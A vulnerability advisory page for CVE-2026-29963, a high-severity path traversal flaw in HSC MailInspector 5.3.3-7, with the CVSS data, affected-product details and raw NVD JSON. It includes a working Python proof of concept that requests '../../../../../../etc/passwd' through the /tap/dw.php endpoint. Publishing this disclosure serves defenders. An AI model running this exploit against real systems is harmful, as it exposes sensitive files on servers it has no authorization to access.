Security Vulnerability Report
中文
CVE-2026-29963 CVSS 7.5 HIGH

CVE-2026-29963

Published: 2026-05-18 18:17:22
Last Modified: 2026-05-19 17:21:06
Source: [email protected]

Description

HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hsclabs:mailinspector:5.3.3-7:*:*:*:*:*:*:* - VULNERABLE
HSC MailInspector 5.3.3-7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_ip): # Target endpoint vulnerable to path traversal url = f"http://{target_ip}/tap/dw.php" # Payload aiming to read /etc/passwd # Using '../' to traverse up the directory structure payload = { "text": "../../../../../../etc/passwd" } try: response = requests.post(url, data=payload, timeout=5) # Check if standard Linux file content is returned if response.status_code == 200 and "root:x" in response.text: print("[+] Exploit successful! File content:") print(response.text) else: print("[-] Exploit failed or target not vulnerable.") print(f"Status: {response.status_code}") print(f"Response: {response.text[:200]}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with actual target exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29963", "sourceIdentifier": "[email protected]", "published": "2026-05-18T18:17:21.517", "lastModified": "2026-05-19T17:21:05.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hsclabs:mailinspector:5.3.3-7:*:*:*:*:*:*:*", "matchCriteriaId": "5A2C551A-C71C-468F-A438-7ED1F576338A"}]}]}], "references": [{"url": "https://github.com/sql3t0/cve-disclosures", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://hsclabs.com/pt-br/mailinspector/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.